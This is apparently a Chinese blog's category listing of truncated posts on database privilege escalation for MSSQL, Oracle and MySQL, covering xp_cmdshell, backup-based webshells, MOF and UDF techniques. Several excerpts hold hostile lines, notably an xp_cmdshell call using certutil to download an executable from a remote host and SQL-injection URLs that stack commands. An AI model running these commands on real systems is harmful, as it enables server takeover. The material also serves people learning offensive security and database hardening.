![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
数据库提权
bylfsj
这个作者很懒,什么都没留下…
展开
-
利用MSSQL getshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本...转载 2019-11-02 20:29:46 · 1547 阅读 · 0 评论 -
MSSQL补充
SQL Server CLRMicrosoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。对于 SQL Server 用户和应用程序开发人员来说,CLR 集成意味着您现在可以使用任何 .NET Fra...原创 2019-10-15 19:40:28 · 283 阅读 · 0 评论 -
数据库加固
1.安装补丁2.修改密码3.使用SSL网络加密4.修改端口5.降权6.系统加固原创 2019-10-14 15:45:22 · 511 阅读 · 0 评论 -
Oracle 提权
1.利用JAVA运行子流命令2.普通账户权限提升经典漏洞---------3.写入webshell原创 2019-10-14 15:40:03 · 609 阅读 · 0 评论 -
Oracle数据库提权(dba权限执行系统命令)
Oracle数据库提权(dba权限执行系统命令) 0x01 提权准备这里我们先创建一个低权限的用户test SQL> conn sys/admin123@orcl as sysdba; 已连接。SQL> create user test identif...转载 2019-10-12 19:10:41 · 541 阅读 · 0 评论 -
mssql log备份getshell
log备份的总结当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法. 但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题LOG备份产生的文件更小log备份L...转载 2019-10-12 19:46:55 · 556 阅读 · 0 评论 -
一篇文章由浅入深了解MSSQL注入
MSSQL提权与站库分离0x00 xp_cmdshellexec master.dbo.xp_cmdshell 'cd c:www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe';exec master.dbo.xp_cmdshell 'cd c:www & fil...原创 2019-10-12 19:46:40 · 439 阅读 · 1 评论 -
MSSQL提权总结
http://192.168.130.137/1.aspx?id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int);http://192.168.130.137/1.aspx?id=1;insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1...转载 2019-10-11 20:51:46 · 806 阅读 · 0 评论 -
mssql差异备份拿shell
简介差异备份数据库得到webshell。在sql server 里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。 差异备份的流程大概这样:1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.b...转载 2019-10-11 19:55:02 · 821 阅读 · 0 评论 -
mssql数据库提权
mssql数据库提权1.关于 “xp_cmdshell”“存储过程”:其实质就是一个“集合”,那么是什么样的结合呢,就是存储在SqlServer中预先定义好的“SQL语句集合”,说的更直白一些就是使用T-SQL语言编写好的各种小脚本共同组成的集合体,我们称之为“存储过程”。 &...转载 2019-10-12 19:14:49 · 303 阅读 · 0 评论 -
oracle数据库的安全测试
oracle数据库的安全测试Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说Oracle数据库系统是目前世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小...转载 2019-10-12 19:15:52 · 364 阅读 · 0 评论 -
MySQL数据库提权小结
一、获取MySQL账号密码:1.查看网站配置文件:这里的前提是获取了webshell是最为方便的,直接查看数据库的配置文件即可,如:conn、config、data、sql、common、inc等。例如,前提是菜刀连接获取Webshell,直接在菜刀中寻找网站配置文件:然后将文件下载下来查看即可:2.查看数据库安装路径下的mysql文件:上面的方法有个缺点,就是给当前网站的数...转载 2019-10-12 19:13:11 · 311 阅读 · 0 评论 -
Oracle数据库提权(dba权限执行系统命令)
0x01 Oracle存储过程”缺陷”在 Oracle 的存储过程中,有一个有趣的特点:运行权限。运行权限分为两种,definer 和 invoker。 definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户。运行权限在函数创建时就已经被钦定了,默认为 definer。 说白了,如果我们用低权限用户去运行DBA权限用...转载 2019-10-12 19:08:27 · 1264 阅读 · 0 评论 -
MySQL启动项提权
关于MySQL的启动项提权,听其名知其意。就是将一段 VBS脚本导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令!这里有两种思路:如果 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在可读写的...原创 2019-10-12 18:47:59 · 542 阅读 · 0 评论 -
提权学习:MySQL数据库提权(mof 漏洞提权)
1.原理关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。2.执行1.将一下代码保存为nullevt.mof文件#pragma namespace("\\.\root\subscription")instance ...原创 2019-10-12 18:33:13 · 608 阅读 · 0 评论 -
MySQL UDF提权执行系统命令1
1.udf提权–版本--------------mysql 5.1版本常遇到的问题----------------------这是最常见的提权方式了,但是往往在执行过程中老是遇到"Can’t open shared library"的情况。这里我们可以利用NTFS ADS流来解决这个问题。select @@basedir; //查找到mysql的目录select 'It is d...原创 2019-10-12 16:50:21 · 429 阅读 · 0 评论 -
MySQL UDF提权执行系统命令
目录UDFUDF提权步骤UDF提权复现(php环境)UDFUDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。那么,我们该如何使用UDF呢?假设...转载 2019-10-12 16:19:21 · 703 阅读 · 0 评论